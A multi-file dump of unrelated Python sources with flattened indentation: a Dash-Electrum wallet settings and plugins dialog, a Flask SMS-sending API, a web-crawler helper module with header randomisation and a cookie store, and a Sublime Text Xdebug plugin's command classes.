ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_list.refresh_headers()
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Dash-Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Dash-Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_transactions(write=True)
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(":icons/offline_tx.png"), None, _('Success'), msg)
return True
def show_masternode_dialog(self):
d = MasternodeDialog(self.masternode_manager, self)
d.exec_()
def proposals_changed(self):
"""Callback for when proposals change."""
if not self.masternode_manager:
return
self.update_proposals_tab()
|
app.py
|
from flask import json
from flask import jsonify
from flask import request
from flask import Flask
from flask import abort
from flask import make_response
from multiprocessing import Process, Value
import time
from listen import listenNewMessages
from setDefaultMessages import setDefaultMessages
from getDefaultMessages import getDefaultMessages
from TextLocal.sendMessage import sendSMS
from configparser import ConfigParser
app = Flask(__name__)
@app.route('/api/v1.0/set_messages', methods=['POST'])
def setMessages():
if not request.json or not 'messages' in request.json:
abort(400)
for reqs in request.json["messages"]:
if reqs["name"] == "GreetingMessage":
req_list_id = 0
elif reqs["name"] == "FoodPlan":
req_list_id = 1
elif reqs["name"] == "Assurance":
req_list_id = 2
elif reqs["name"] == "Reply":
req_list_id = 3
else:
abort(400)
setDefaultMessages(reqs["message"], req_list_id)
return jsonify(getDefaultMessages()), 201
@app.route('/api/v1.0/get_messages', methods=['GET'])
def getMessages():
return jsonify(getDefaultMessages())
@app.route('/api/v1.0/send_messages', methods=['POST'])
def sndMssg():
if not request.json:
abort(400)
cfg = ConfigParser()
cfg.read('config.ini')
return sendSMS(cfg.get('TextLocalKeys', 'TextLocal_api_key'), request.json["numbers"], request.json["message"])
@app.route('/api/v1.0/send_default_messages', methods=['POST'])
def sndDefaultMssg():
if not request.json:
abort(400)
if request.json["message_type"] == "GreetingMessage":
req_list_id = 0
elif request.json["message_type"] == "FoodPlan":
req_list_id = 1
elif request.json["message_type"] == "Assurance":
req_list_id = 2
elif request.json["message_type"] == "Reply":
req_list_id = 3
else:
abort(400)
message = getDefaultMessages()["messages"][req_list_id]["message"]
cfg = ConfigParser()
cfg.read('config.ini')
return sendSMS(cfg.get('TextLocalKeys', 'TextLocal_api_key'), request.json["numbers"], message)
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
if __name__ == "__main__":
p = Process(target=listenNewMessages)
p.start()
app.run(debug=True, use_reloader=False)
p.join()
|
tools.py
|
"""
tools.py
written by ariyn
"""
from random import randrange
from urllib.request import Request, urlopen
from urllib.error import HTTPError
from copy import copy
from zipfile import ZipFile
from tempfile import NamedTemporaryFile
import json
import unicodedata
import re
import multiprocessing
import os
import time
import logging
from logging.handlers import RotatingFileHandler, SysLogHandler
GetHost = lambda url: url.replace("http://", "").replace("https://", "").split("/")[0]
lorem = "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum."
def __randomHeader__(host=''):
version = (randrange(40, 55, 1), randrange(0, 60, 1), randrange(2500, 3500))
mozilla = "Mozilla/%d.0 (Windows NT 6.1)"%(version[0]//10)
webkit = "AppleWebKit/%d.%d (KHTML, like Gecko)"%(version[0], version[1])
chrome = "Chrome/%d.0.%d.115"%(version[1], version[2])
safari = "Safari/%d.%d"%(version[0], version[1])
agent = "%s %s %s %s"%(mozilla, webkit, chrome, safari)
return version, {
"Accept":"text/html,application/xhtml+xml,application/xml;"+
"q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding":"gzip, deflate",
"Accept-Language":"ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4",
"Cache-Control":"max-age=0",
"Connection":"keep-alive",
"Host":host,
"Upgrade-Insecure-Requests":"1",
"User-Agent":agent
}
randomHeader = lambda host='': copy(__randomHeader__(host)[1])
def multiDownload(path, referer, urls, interval=0.5, chunkSize=5):
"""
download several urls
urls structure must be changed
"""
headers = randomHeader()
headers["Referer"] = referer
processList = []
headers["Host"] = GetHost(urls[0][1])
newUrls = []
for i in range(0, len(urls), chunkSize):
newUrls.append(urls[i:i+chunkSize])
with Log() as log:
for i,v in enumerate(newUrls):
p = multiprocessing.Process(target=__downloadProcess__, args=(path, headers, v, interval, i, log))
processList.append(p)
p.start()
for p in processList:
p.join()
def __downloadProcess__(path, header, urls, interval, index, logger):
for i in urls:
try:
req = Request(i[1], headers=header)
res = urlopen(req)
x = open(path+"/"+i[0], "wb")
x.write(res.read())
x.close()
except HTTPError as e:
logger.error('download error to %s/%s', path, i[0], extra = {
"code":str(e.code),
"reason":e.reason,
"url":i[1]
})
time.sleep(interval)
def escapeFilenames(value):
"""
escape file names for linux file system
"""
value = unicodedata.normalize('NFKD', value)#.encode('utf-8')
value = re.sub(r'[^\w\s-]', '', value).strip().lower()
value = re.sub(r'[-\s]+', '-', value)
return value
def compressFile(name, target, destination, removeOriginal=False):
"""
compress file
"""
try:
fileList = os.listdir(target)
except NotADirectoryError:# as e:
return 0
fileName = "%s/%s.zip"%(destination, name)
z = ZipFile(fileName, "w")
for i in fileList:
if ".zip" not in i:
z.write(target+"/"+i, i)
ret = z.testzip()
if ret is not None:
print("First bad file in %s.zip: %s" % (name, ret))
z.close()
if removeOriginal and ret is None:
for i in fileList:
os.remove(target+"/"+i)
os.rmdir(target)
return fileName
## cookie manager must be singleton instance
class __cookieManager__:
keywords = ["set-cookie", "host", "date"]
def __saveCookies__(self):
for key in self.changedCookie:
with open("%s/%s"%(self.userDir, key), "w") as file:
file.write(self.__get__(key))
def __init__(self):
from sys import platform
import atexit
from pathlib import Path
self.cookies = {}
self.changedCookie = set()
### is linux
if platform == "linux" or platform == "linux2" or platform == "darwin":
userDir = "%s/.cookies"%str(Path.home())
if not os.path.isdir(userDir):
os.mkdir(userDir)
elif platform == "win32":
userDir = "%s/Documents/cookies"%(os.environ['USERPROFILE'])
if not os.path.isdir(userDir):
os.mkdir(userDir)
list = os.scandir(userDir)
for file in list:
if not file.name.startswith('.') and file.is_file():
cookieStr = open(file.path, "r").read()
cookie= __cookieManager__.parseCookie(cookieStr)
if cookieStr == "":
continue
self.cookies[file.name] = {}
self.cookies[file.name].update(cookie)
self.userDir = userDir
# print(self.__saveCookies__)
atexit.register(self.__saveCookies__)
@staticmethod
def parseCookie(cookie):
pc = [i.strip().split("=") for i in cookie.split(";")]
pc = [i if len(i) == 2 else [i[0], i[0]] for i in pc]
return pc
def __add__(self, domain, cookie):
if domain not in self.cookies:
self.cookies[domain] = {}
cookie = __cookieManager__.parseCookie(cookie)
# https://tools.ietf.org/html/rfc6265#section-5.2
self.cookies[domain].update(cookie)
self.changedCookie.add(domain)
def __get__(self, domain):
# print(domain)
if domain in self.cookies:
return "; ".join(["%s=%s"%(k, v) for k,v in self.cookies[domain].items()])
else:
return ""
def __getitem__(self, key):
return self.__get__(key)
def __setitem__(self, key, value):
return self.__add__(key, value)
class Log:
debugFile = NamedTemporaryFile(suffix=".log", prefix="crawl-", delete=False)
path = "./log/crawl.log"
debug = False
format = "%(asctime)-15s %(url)s %(message)s %(code)-3s\n\t%(reason)s\n"
def __init__(self, name="crawler", path=None, format=None, debug=False):
debug = debug or self.debug
if format is None:
format = Log.format
self.log = logging.getLogger(name)
if not hasattr(self.log, "stdFileHandler"):
setattr(self.log, "stdFileHandler", False)
setattr(self.log, "stdStreamHandler", False)
self.log.setLevel(logging.INFO if not debug else logging.DEBUG)
self.formatter = logging.Formatter(format)
if path is not None:
self.path = path
# if debug:
# self.path = self.debugFile.name
if not self.log.stdFileHandler:
fileHandler = RotatingFileHandler(self.path, maxBytes=1024*1024)
fileHandler.setFormatter(self.formatter)
self.log.addHandler(fileHandler)
self.log.stdFileHandler = True
if debug and not self.log.stdStreamHandler:
streamHandler = logging.StreamHandler()
streamHandler.setFormatter(self.formatter)
self.log.addHandler(streamHandler)
self.log.stdStreamHandler = True
def __enter__(self):
self.log.__parent__ = self
return self.log
def __exit__(self, exc_type, exc_value, traceback):
pass
CookieManager = __cookieManager__()
|
main.py
|
import sublime
import sublime_plugin
import os
import sys
import threading
# Load modules
try:
from .xdebug import *
except:
from xdebug import *
# Set Python libraries from system installation
python_path = config.get_value(S.KEY_PYTHON_PATH)
if python_path:
python_path = os.path.normpath(python_path.replace("\\", "/"))
python_dynload = os.path.join(python_path, 'lib-dynload')
if python_dynload not in sys.path:
sys.path.append(python_dynload)
# Define path variables
try:
S.PACKAGE_PATH = os.path.dirname(os.path.realpath(__file__))
S.PACKAGE_FOLDER = os.path.basename(S.PACKAGE_PATH)
except:
pass
# Initialize package
sublime.set_timeout(lambda: load.xdebug(), 1000)
# Define event listener for view(s)
class EventListener(sublime_plugin.EventListener):
def on_load(self, view):
filename = view.file_name()
# Scroll the view to current breakpoint line
if filename and filename in S.SHOW_ROW_ONLOAD:
V.show_at_row(view, S.SHOW_ROW_ONLOAD[filename])
del S.SHOW_ROW_ONLOAD[filename]
# Render breakpoint markers
sublime.set_timeout(lambda: V.render_regions(view), 0)
def on_activated(self, view):
# Render breakpoint markers
V.render_regions(view)
def on_post_save(self, view):
filename = view.file_name()
# Render breakpoint markers
V.render_regions(view)
# Update config when settings file or sublime-project has been saved
if filename and (filename.endswith(S.FILE_PACKAGE_SETTINGS) or filename.endswith('.sublime-project')):
config.load_package_values()
config.load_project_values()
#TODO: Save new location of breakpoints on save
def on_selection_modified(self, view):
# Show details in output panel of selected variable in context window
if view.name() == V.TITLE_WINDOW_CONTEXT:
V.show_context_output(view)
elif view.name() == V.TITLE_WINDOW_BREAKPOINT:
V.toggle_breakpoint(view)
elif view.name() == V.TITLE_WINDOW_STACK:
V.toggle_stack(view)
elif view.name() == V.TITLE_WINDOW_WATCH:
V.toggle_watch(view)
else:
pass
class XdebugBreakpointCommand(sublime_plugin.TextCommand):
"""
Add/Remove breakpoint(s) for rows (line numbers) in selection.
"""
def run(self, edit, rows=None, condition=None, enabled=None, filename=None):
# Get filename in current view and check if is a valid filename
if filename is None:
filename = self.view.file_name()
if not filename or not os.path.isfile(filename):
return
# Add entry for file in breakpoint data
if filename not in S.BREAKPOINT:
S.BREAKPOINT[filename] = {}
# When no rows are defined, use selected rows (line numbers), filtering empty rows
if rows is None:
rows = V.region_to_rows(self.view.sel(), filter_empty=True)
# Loop through rows
for row in rows:
expression = None
if condition is not None and len(condition.strip()) > 0:
expression = condition
# Check if breakpoint exists
breakpoint_exists = row in S.BREAKPOINT[filename]
# Disable/Remove breakpoint
if breakpoint_exists:
if S.BREAKPOINT[filename][row]['id'] is not None and session.is_connected(show_status=True):
async_session = session.SocketHandler(session.ACTION_REMOVE_BREAKPOINT, breakpoint_id=S.BREAKPOINT[filename][row]['id'])
async_session.start()
if enabled is False:
S.BREAKPOINT[filename][row]['enabled'] = False
elif enabled is None:
del S.BREAKPOINT[filename][row]
# Add/Enable breakpoint
if not breakpoint_exists or enabled is True:
if row not in S.BREAKPOINT[filename]:
S.BREAKPOINT[filename][row] = { 'id': None, 'enabled': True, 'expression': expression }
else:
S.BREAKPOINT[filename][row]['enabled'] = True
if condition is not None:
S.BREAKPOINT[filename][row]['expression'] = expression
else:
expression = S.BREAKPOINT[filename][row]['expression']
if session.is_connected(show_status=True):
async_session = session.SocketHandler(session.ACTION_SET_BREAKPOINT, filename=filename, lineno=row, expression=expression)
async_session.start()
# Render breakpoint markers
V.render_regions()
# Update breakpoint list
try:
if V.has_debug_view(V.TITLE_WINDOW_BREAKPOINT):
V.show_content(V.DATA_BREAKPOINT)
except:
pass
# Save breakpoint data to file
util.save_breakpoint_data()
class XdebugConditionalBreakpointCommand(sublime_plugin.TextCommand):
"""
Add conditional breakpoint(s) for rows (line numbers) in selection.
"""
def run(self, edit):
self.view.window().show_input_panel('Breakpoint condition', '', self.on_done, self.on_change, self.on_cancel)
def on_done(self, condition):
self.view.run_command('xdebug_breakpoint', {'condition': condition, 'enabled': True})
def on_change(self, line):
pass
def on_cancel(self):
pass
class XdebugClearBreakpointsCommand(sublime_plugin.TextCommand):
"""
Clear breakpoints in selected view.
"""
def run(self, edit):
filename = self.view.file_name()
if filename and filename in S.BREAKPOINT:
rows = H.dictionary_keys(S.BREAKPOINT[filename])
self.view.run_command('xdebug_breakpoint', {'rows': rows, 'filename': filename})
# Continue debug session when breakpoints are cleared on current script being debugged
if S.BREAKPOINT_ROW and self.view.file_name() == S.BREAKPOINT_ROW['filename']:
self.view.window().run_command('xdebug_execute', {'command': 'run'})
def is_enabled(self):
filename = self.view.file_name()
if filename and S.BREAKPOINT and filename in S.BREAKPOINT and S.BREAKPOINT[filename]:
return True
return False
def is_visible(self):
filename = self.view.file_name()
if filename and S.BREAKPOINT and filename in S.BREAKPOINT and S.BREAKPOINT[filename]:
return True
return False
class XdebugClearAllBreakpointsCommand(sublime_plugin.WindowCommand):
"""
Clear breakpoints from all views.
"""
def run(self):
view = sublime.active_window().active_view()
# Unable to run to line when no view available
if view is None:
return
for filename, breakpoint_data in S.BREAKPOINT.items():
if breakpoint_data:
rows = H.dictionary_keys(breakpoint_data)
view.run_command('xdebug_breakpoint', {'rows': rows, 'filename': filename})
# Continue debug session when breakpoints are cleared on current script being debugged
self.window.run_command('xdebug_execute', {'command': 'run'})
def is_enabled(self):
if S.BREAKPOINT:
for filename, breakpoint_data in S.BREAKPOINT.items():
if breakpoint_data:
return True
return False
def is_visible(self):
if S.BREAKPOINT:
for filename, breakpoint_data in S.BREAKPOINT.items():
if breakpoint_data:
return True
return False
class XdebugRunToLineCommand(sublime_plugin.WindowCommand):
"""
Run script to current selected line in view, ignoring all other breakpoints.
"""
def run(self):
view = sublime.active_window().active_view()
# Unable to run to line when no view available
if view is None:
return
# Determine filename for current view and check if is a valid filename
filename = view.file_name()
if not filename or not os.path.isfile(filename):
return
# Get first line from selected rows and make sure it is not empty
rows = V.region_to_rows(filter_empty=True)
if rows is None or len(rows) == 0:
return
lineno = rows[0]
# Check if breakpoint does not already exists
breakpoint_exists = False
if filename in S.BREAKPOINT and lineno in S.BREAKPOINT[filename]:
breakpoint_exists = True
# Store line number and filename for temporary breakpoint in session
if not breakpoint_exists:
S.BREAKPOINT_RUN = { 'filename': filename, 'lineno': lineno }
# Set breakpoint and run script
view.run_command('xdebug_breakpoint', {'rows': [lineno], 'enabled': True, 'filename': filename})
self.window.run_command('xdebug_execute', {'command': 'run'})
def is_enabled(self):
return S.BREAKPOINT_ROW is not None and session.is_connected()
def is_visible(self):
return S.BREAKPOINT_ROW is not None and session.is_connected()
class XdebugSessionStartCommand(sublime_plugin.WindowCommand):
"""
Start Xdebug session, listen for request response from debugger engine.
"""
def run(self, launch_browser=False, restart=False):
# Define new session with DBGp protocol
S.SESSION = protocol.Protocol()
S.SESSION_BUSY = False
S.BREAKPOINT_EXCEPTION = None
S.BREAKPOINT_ROW = None
S.CONTEXT_DATA.clear()
async_session = session.SocketHandler(session.ACTION_WATCH, check_watch_view=True)
async_session.start()
# Remove temporary breakpoint
if S.BREAKPOINT_RUN is not None and S.BREAKPOINT_RUN['filename'] in S.BREAKPOINT and S.BREAKPOINT_RUN['lineno'] in S.BREAKPOINT[S.BREAKPOINT_RUN['filename']]:
self.window.active_view().run_command('xdebug_breakpoint', {'rows': [S.BREAKPOINT_RUN['lineno']], 'filename': S.BREAKPOINT_RUN['filename']})
S.BREAKPOINT_RUN = None
# Set debug layout
self.window.run_command('xdebug_layout')
# Launch browser
if launch_browser or (config.get_value(S.KEY_LAUNCH_BROWSER) and not restart):
util.launch_browser()
# Start thread which will run method that listens for response on configured port
threading.Thread(target=self.listen).start()
def listen(self):
# Start listening for response from debugger engine
S.SESSION.listen()
# On connect run method which handles connection
if S.SESSION and S.SESSION.connected:
sublime.set_timeout(self.connected, 0)
def connected(self):
sublime.set_timeout(lambda: sublime.status_message('Xdebug: Connected'), 100)
async_session = session.SocketHandler(session.ACTION_INIT)
async_session.start()
def is_enabled(self):
if S.SESSION:
return False
return True
def is_visible(self, launch_browser=False):
if S.SESSION:
return False
if launch_browser and (config.get_value(S.KEY_LAUNCH_BROWSER) or not config.get_value(S.KEY_URL)):
return False
return True
class XdebugSessionRestartCommand(sublime_plugin.WindowCommand):
def run(self):
self.window.run_command('xdebug_session_stop', {'restart': True})
self.window.run_command('xdebug_session_start', {'restart': True})
sublime.set_timeout(lambda: sublime.status_message('Xdebug: Restarted debugging session. Reload page to continue debugging.'), 100)
def is_enabled(self):
if S.SESSION:
return True
return False
def is_visible(self):
if S.SESSION:
return True
return False
class XdebugSessionStopCommand(sublime_plugin.WindowCommand):
"""
Stop Xdebug session, close connection and stop listening to debugger engine.
"""
def run(self, close_windows=False, launch_browser=False, restart=False):
try:
S.SESSION.clear()
except:
pass
finally:
S.SESSION = None
S.SESSION_BUSY = False
S.BREAKPOINT_EXCEPTION = None
S.BREAKPOINT_ROW = None
S.CONTEXT_DATA.clear()
async_session = session.SocketHandler(session.ACTION_WATCH, check_watch_view=True)
async_session.start()
# Remove temporary breakpoint
if S.BREAKPOINT_RUN is not None and S.BREAKPOINT_RUN['filename'] in S.BREAKPOINT and S.BREAKPOINT_RUN['lineno'] in S.BREAKPOINT[S.BREAKPOINT_RUN['filename']]:
self.window.active_view().run_command('xdebug_breakpoint', {'rows': [S.BREAKPOINT_RUN['lineno']], 'filename': S.BREAKPOINT_RUN['filename']})
S.BREAKPOINT_RUN = None
# Launch browser
if launch_browser or (config.get_value(S.KEY_LAUNCH_BROWSER) and not restart):
util.launch_browser()
# Close or reset debug layout
if close_windows or config.get_value(S.KEY_CLOSE_ON_STOP):
if config.get_value(S.KEY_DISABLE_LAYOUT):
self.window.run_command('xdebug_layout', {'close_windows': True})
else:
self.window.run_command('xdebug_layout', {'restore': True})
else:
self.window.run_command('xdebug_layout')
# Render breakpoint markers
V.render_regions()
def is_enabled(self):
if S.SESSION:
return True
return False
def is_visible(self, close_windows=False, launch_browser=False):
if S.SESSION:
if close_windows and config.get_value(S.KEY_CLOSE_ON_STOP):
return False
if launch_browser and (config.get_value(S.KEY_LAUNCH_BROWSER) or not config.get_value(S.KEY_URL)):
return False
return True
return False
class XdebugExecuteCommand(sublime_plugin.WindowCommand):
"""
Execute command, handle breakpoints and reload session when page execution has completed.
Keyword arguments:
command -- Command to send to debugger engine.
"""
def run(self, command=None):
async_session = session.SocketHandler(session.ACTION_EXECUTE, command=command)
async_session.start()
def is_enabled(self):
return session.is_connected()
class XdebugContinueCommand(sublime_plugin.WindowCommand):
"""
Continuation commands when on breakpoint, show menu by default if no command has been passed as argument.
Keyword arguments:
command -- Continuation command to execute.
"""
commands = H.new_dictionary()
commands[dbgp.RUN] = 'Run'
commands[dbgp.STEP_OVER] = 'Step Over'
commands[dbgp.STEP_INTO] = 'Step Into'
commands[dbgp.STEP_OUT] = 'Step Out'
commands[dbgp.STOP] = 'Stop'
commands[dbgp.DETACH] = 'Detach'
command_index = H.dictionary_keys(commands)
command_options = H.dictionary_values(commands)
def run(self, command=None):
if not command or not command in self.commands:
self.window.show_quick_panel(self.command_options, self.callback)
else:
self.callback(command)
def callback(self, command):
if command == -1 or S.SESSION_BUSY:
return
if isinstance(command, int):
command = self.command_index[command]
self.window.run_command('xdebug_execute', {'command': command})
def is_enabled(self):
return S.BREAKPOINT_ROW is not None and session.is_connected()
def is_visible(self):
return S.BREAKPOINT_ROW is not None and session.is_connected()
class XdebugStatusCommand(sublime_plugin.WindowCommand):
"""
Get status from debugger engine.
"""
def run(self):
async_session = session.SocketHandler(session.ACTION_STATUS)
async_session.start()
def is_enabled(self):
return session.is_connected()
def is_visible(self):
return session.is_connected()
class XdebugEvaluateCommand(sublime_plugin.WindowCommand):
def run(self):
self.window.show_input_panel('Evaluate', '', self.on_done, self.on_change, self.on_cancel)
def on_done(self, expression):
async_session = session.SocketHandler(session.ACTION_EVALUATE, expression=expression)
async_session.start()
def on_change(self, expression):
pass
def on_cancel(self):
pass
def is_enabled(self):
return session.is_connected()
def is_visible(self):
return session.is_connected()
class XdebugUserExecuteCommand(sublime_plugin.WindowCommand):
"""
Open input panel, allowing user to execute arbitrary command according to DBGp protocol.
Note: Transaction ID is automatically generated by session module.
"""
def run(self):
self.window.show_input_panel('DBGp command', '', self.on_done, self.on_change, self.on_cancel)
def on_done(self, line):
# Split command and arguments, define arguments when only command is defined.
if ' ' in line:
command, args = line.split(' ', 1)
else:
command, args = line, ''
async_session = session.SocketHandler(session.ACTION_USER_EXECUTE, command=command, args=args)
async_session.start()
def on_change(self, line):
pass
def on_cancel(self):
pass
def is_enabled(self):
return session.is_connected()
def is_visible(self):
return session.is_connected()
class XdebugWatchCommand(sublime_plugin.WindowCommand):
"""
Add/Edit/Remove watch expression.
"""
def run(self, clear=False, edit=False, remove=False, update=False):
self.edit = edit
self.remove = remove
self.watch_index = None
# Clear watch expressions in list
if clear:
try:
# Python 3.3+
S.WATCH.clear()
except AttributeError:
del S.WATCH[:]
# Update watch view
self.update_view()
# Edit or remove watch expression
elif edit or remove:
# Generate list with available watch expressions
watch_options = []
for index, item in enumerate(S.WATCH):
watch_item = '[{status}] - {expression}'.format(index=index, expression=item['expression'], status='enabled' if item['enabled'] else 'disabled')
watch_options.append(watch_item)
self.window.show_quick_panel(watch_options, self.callback)
elif update:
self.update_view()
# Set watch expression
else:
self.set_expression()
def callback(self, index):
# User has cancelled action
if index == -1:
return
# Make sure index is valid integer
if isinstance(index, int) or H.is_digit(index):
self.watch_index = int(index)
# Edit watch expression
if self.edit:
self.set_expression()
# Remove watch expression
else:
S.WATCH.pop(self.watch_index)
# Update watch view
self.update_view()
def on_done(self, expression):
# User did not set expression
if not expression:
return
# Check if expression is not already defined
matches = [x for x in S.WATCH if x['expression'] == expression]
if matches:
sublime.status_message('Xdebug: Watch expression already defined.')
return
# Add/Edit watch expression in session
watch = {'expression': expression, 'enabled': True, 'value': None, 'type': None}
if self.watch_index is not None and isinstance(self.watch_index, int):
try:
S.WATCH[self.watch_index]['expression'] = expression
except:
S.WATCH.insert(self.watch_index, watch)
else:
S.WATCH.append(watch)
# Update watch view
self.update_view()
def on_change(self, line):
pass
def on_cancel(self):
pass
def set_expression(self):
# Show user input for setting watch expression
self.window.show_input_panel('Watch expression', '', self.on_done, self.on_change, self.on_cancel)
def update_view(self):
async_session = session.SocketHandler(session.ACTION_WATCH, check_watch_view=True)
async_session.start()
# Save watch data to file
util.save_watch_data()
def is_visible(self, clear=False, edit=False, remove=False):
if (clear or edit or remove) and not S.WATCH:
return False
return True
class XdebugViewUpdateCommand(sublime_plugin.TextCommand):
"""
Update content of sublime.Edit object in view, instead of using begin_edit/end_edit.
Keyword arguments:
data -- Content data to populate sublime.Edit object with.
readonly -- Make sublime.Edit object read only.
"""
def run(self, edit, data=None, readonly=False):
view = self.view
view.set_read_only(False)
view.erase(edit, sublime.Region(0, view.size()))
if data is not None:
view.insert(edit, 0, data)
if readonly:
view.set_read_only(True)
class XdebugLayoutCommand(sublime_plugin.WindowCommand):
"""
Toggle between debug and default window layouts.
"""
def run(self, restore=False, close_windows=False, keymap=False):
# Get active window
window = sublime.active_window()
# Do not restore layout or close windows while debugging
if S.SESSION and (restore or close_windows or keymap):
return
# Set layout, unless user disabled debug layout
if not config.get_value(S.KEY_DISABLE_LAYOUT):
if restore or keymap:
V.set_layout('normal')
else:
V.set_layout('debug')
# Close all debugging related windows
if close_windows or restore or keymap:
V.close_debug_windows()
return
# Reset data in debugging related windows
V.show_content(V.DATA_BREAKPOINT)
V.show_content(V.DATA_CONTEXT)
V.show_content(V.DATA_STACK)
V.show_content(V.DATA_WATCH)
